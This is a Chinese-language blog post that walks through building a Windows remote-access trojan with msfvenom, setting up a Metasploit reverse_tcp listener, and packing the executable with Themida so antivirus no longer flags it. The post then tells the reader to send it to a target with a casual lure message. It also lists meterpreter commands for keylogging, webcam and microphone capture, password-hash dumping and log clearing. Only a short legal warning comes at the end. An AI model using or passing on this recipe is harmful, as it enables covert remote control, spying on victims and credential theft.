分享

kali生成木马加壳

 新用户5202pCXx 2022-05-02 发布于山东

使用此方法进行screenshare时无法看到QQ程序画面。2022.2.14

1、使用msfvenom生成远控木马

msfvenom在shell里使用,即终端。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=10000 -f exe -o 361.exe

解释:
-p payload
payload_name 系统/架构/作用/方式
lhost 虚拟机IP
lpost 虚拟机端口号
-f format
exe Windows可执行文件
-o output
361.exe 文件名和扩展名

在这里插入图片描述

保存的路径为:/home/kali

2、在msfconsole中开启监听

进入msfconsole
msfconsole
在这里插入图片描述
use exploit/multi/handler运行负载/处理程序
set payload windows/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1虚拟机IP
set lport 10000
run
在这里插入图片描述

3、将木马程序复制到本机

在这里插入图片描述
复制进去后杀毒软件会报毒
在这里插入图片描述点击找回文件
在这里插入图片描述
点击恢复
在这里插入图片描述
取消勾选,确定
在这里插入图片描述
不然没法测试

4、使用加壳工具Themida对木马程序进行加工

运行Themida64.exe
在这里插入图片描述
将木马程序载入,点击protect
在这里插入图片描述程序自动运行加壳
在这里插入图片描述
输出加壳木马程序361_protected.exe
在这里插入图片描述
测试查杀无毒
在这里插入图片描述将加壳木马程序发送给攻击目标

“老弟,我刚找到个好玩的东西,发给你看看~”

5、运行木马程序

使用本机进行测试

在本机运行木马程序,出现监听结果
在这里插入图片描述
如使用screenshot指令对攻击机屏幕截图,文件保存在/home/kali文件夹内
在这里插入图片描述
使用help或者?查看可使用指令,能实现所支持功能的所有远控手段。
具体如下:

Core Commands

Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bg                        Alias for background
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
detach                    Detach the meterpreter session (for http/https)
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
guid                      Get the session GUID
help                      Help menu
info                      Displays information about a Post module
irb                       Open an interactive Ruby shell on the current session
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
migrate                   Migrate the server to another process
pivot                     Manage pivot listeners
pry                       Open the Pry debugger on the current session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
secure                    (Re)Negotiate TLV packet encryption on the session
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                     Force Meterpreter to go quiet, then re-establish sess
                          ion
ssl_verify                Modify the SSL certificate verification setting
transport                 Manage the transport mechanisms
use                       Deprecated alias for "load"
uuid                      Get the UUID for the current session
write                     Writes data to a channel

Stdapi: File system Commands

Command       Description
-------       -----------
cat           Read the contents of a file to the screen
cd            Change directory
checksum      Retrieve the checksum of a file
cp            Copy source to destination
del           Delete the specified file
dir           List files (alias for ls)
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lls           List local files
lpwd          Print local working directory
ls            List files
mkdir         Make directory
mv            Move source to destination
pwd           Print working directory
rm            Delete the specified file
rmdir         Remove directory
search        Search for files
show_mount    List all mount points/logical drives
upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description
-------       -----------
arp           Display the host ARP cache
getproxy      Display the current proxy configuration
ifconfig      Display interfaces
ipconfig      Display interfaces
netstat       Display the network connections
portfwd       Forward a local port to a remote service
resolve       Resolve a set of host names on the target
route         View and modify the routing table

Stdapi: System Commands

Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as
kill          Terminate a process
localtime     Displays the target system local date and time
pgrep         Filter processes by name
pkill         Terminate processes by name
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
suspend       Suspends or resumes a list of processes
sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command        Description
-------        -----------
enumdesktops   List all accessible desktops and window stations
getdesktop     Get the current meterpreter desktop
idletime       Returns the number of seconds the remote user has been idle
keyboard_send  Send keystrokes
keyevent       Send key events
keyscan_dump   Dump the keystroke buffer
keyscan_start  Start capturing keystrokes
keyscan_stop   Stop capturing keystrokes
mouse          Send mouse events
screenshare    Watch the remote user desktop in real time
screenshot     Grab a screenshot of the interactive desktop
setdesktop     Change the meterpreters current desktop
uictl          Control some of the user interface components

Stdapi: Webcam Commands

Command        Description
-------        -----------
record_mic     Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

Command       Description
-------       -----------
play          play a waveform audio file (.wav) on the target system

Priv: Elevate Commands

Command       Description
-------       -----------
getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

Command       Description
-------       -----------
hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands

Command       Description
-------       -----------
timestomp     Manipulate file MACE attributes

后门木马请勿随意传播,如造成危害,属于提供计算机操作系统入侵工具罪及非法入侵计算机操作系统数罪并罚。

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多